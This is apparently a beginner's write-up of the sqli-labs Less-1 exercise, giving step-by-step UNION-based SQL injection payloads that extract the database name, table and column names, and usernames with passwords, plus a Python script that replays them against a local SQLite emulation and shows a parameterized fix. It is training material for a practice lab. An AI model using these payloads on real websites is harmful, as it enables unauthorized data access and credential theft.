A beginner learning injection: sqli-labs Less-1 learning record

sqli-labs ----- Less-1, string (single-quote) injection: UNION query injection

1. Finding the injection point and the injection type
(1) Enter ' after the id value. The database error message that comes back suggests that the id value is placed inside single quotes in the query, so our input ends up followed by a single quote.
(2) Enter ' and 1=1 --+ and the page returns normally. (Beginner's note: --+ comments out the rest of the SQL statement; the + is URL-decoded to a space, which MySQL's -- comment requires.)
Enter ' and 1=2 --+ and the page no longer shows the record. Because a true condition and a false condition give different results, this confirms that the id parameter is injectable and that it is treated as a string.
2. Use order by to find the number of columns
Using ' order by N --+ and increasing N until the page errors, we find that the current table has three columns. (Beginner's note: you can guess faster with binary search: try a middle value, then halve the range depending on whether it errors.)
3. Get the database name
Use a union select query to read out the database name.
?id=-1' union select 1,2,3 --+ : look at which numbers are echoed on the page. Here columns 2 and 3 are displayed. (The -1 makes the original WHERE clause match nothing, so the page shows our union row instead.)
?id=-1' union select 1,2,database() --+ : the database name, security, appears in position 3.
(Beginner's note: database() returns the name of the current database. Similar functions are version(), which returns the database version, and current_user(), which returns the MySQL user name and host name of the current session.)
4. Get the table names
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
The tables are users, emails, referers and uagents; users is obviously the user table we need.
5. Get the column names
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
6. Get the account usernames and passwords
?id=-1' union select 1,2,group_concat(username,'~',password) from users --+ (Beginner's note: the ~ is used here to separate each username from its password.)

PS: Beginner's notes
(1) information_schema can be thought of as an "information database": it holds several read-only tables that store metadata about all the other databases on the MySQL server, such as database names, table names and column names.
(2) The tables table in information_schema provides information about tables; the columns table provides information about the columns of each table.
(3) group_concat() concatenates all values of the queried field into a single record. In this example it returns every username and password in one row, which matters because the page only echoes one row.
(4) Summary of the method: first use ' and the resulting error message to decide whether an injection point exists and whether it is string or numeric injection; then use order by to find the number of columns; then use union select to find which columns are echoed; finally, step by step, retrieve the database name, table names, column names and column contents.
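The whole procedure from steps 1 to 6 and the summary above, as an added runnable example that is not part of the original post or of sqli-labs. It emulates the Less-1 page (id URL-decoded and pasted between single quotes into the query) against an in-memory SQLite database with constructed sample rows, so it runs offline. SQLite has no information_schema, database() or version(), so sqlite_master, pragma_table_info() and sqlite_version() stand in for them; the function names less1_page, less1_fixed and run_steps are hypothetical, and the last function shows the parameterized form that stops the injection.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the lab's security.users table (sample rows, not real lab data).
SAMPLE_USERS = [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("Dummy", "p@ssword")]


def make_db():
    """In-memory SQLite database with a users(id, username, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def less1_page(conn, raw_id):
    """Emulates the vulnerable Less-1 page (hypothetical name): the id parameter is
    URL-decoded, so '+' becomes a space (this is why the payloads end in --+), and
    then spliced between single quotes in the query text. Returns
    ("ok", (username, password)), ("empty", None) or ("error", message),
    mirroring the three things the real page shows."""
    id_value = unquote_plus(raw_id)
    sql = f"SELECT * FROM users WHERE id='{id_value}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:   # the database error the page prints
        return ("error", str(exc))
    if row is None:
        return ("empty", None)
    return ("ok", (row[1], row[2]))          # Less-1 echoes only username and password


def less1_fixed(conn, raw_id):
    """Hardened form: the value is bound as a parameter and never becomes SQL text,
    so quotes, comments and UNION inside it are just characters to compare against."""
    id_value = unquote_plus(raw_id)
    row = conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_value,)).fetchone()
    return ("empty", None) if row is None else ("ok", (row[1], row[2]))


# The six steps of the write-up as GET parameter values. MySQL-only names are swapped
# for SQLite equivalents: sqlite_version() for version(), sqlite_master for
# information_schema.tables, pragma_table_info() for information_schema.columns.
STEPS = [
    ("1a. single quote -> DB error",           "1'"),
    ("1b. true condition -> normal page",      "1' and 1=1 --+"),
    ("1c. false condition -> record gone",     "1' and 1=2 --+"),
    ("2a. order by 3 works",                   "1' order by 3 --+"),
    ("2b. order by 4 errors -> 3 columns",     "1' order by 4 --+"),
    ("3a. which positions are echoed",         "-1' union select 1,2,3 --+"),
    ("3b. DB version in position 3",           "-1' union select 1,2,sqlite_version() --+"),
    ("4. table names",
     "-1' union select 1,2,group_concat(name) from sqlite_master where type='table' --+"),
    ("5. column names of users",
     "-1' union select 1,2,group_concat(name) from pragma_table_info('users') --+"),
    ("6. dump username~password",
     "-1' union select 1,2,group_concat(username||'~'||password) from users --+"),
]


def run_steps(conn):
    """Runs every payload against the vulnerable page and returns (label, result) pairs."""
    return [(label, less1_page(conn, payload)) for label, payload in STEPS]


if __name__ == "__main__":
    db = make_db()
    for label, result in run_steps(db):
        print(f"{label:38} -> {result}")
    print("fixed page, same dump payload        ->", less1_fixed(db, STEPS[-1][1]))
```

Running it shows the same signal the write-up relies on at each step: a syntax error for the lone quote, a present versus missing record for 1=1 versus 1=2, an "ORDER BY term out of range" error at order by 4, the numbers 2 and 3 echoed by the union row, and finally one row holding every username~password pair. Against less1_fixed the dump payload simply returns no record, because the whole string is compared against id as data.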


Beginner's injection learning, recorded!!

Source: www.cnblogs.com/ersuani/p/12563563.html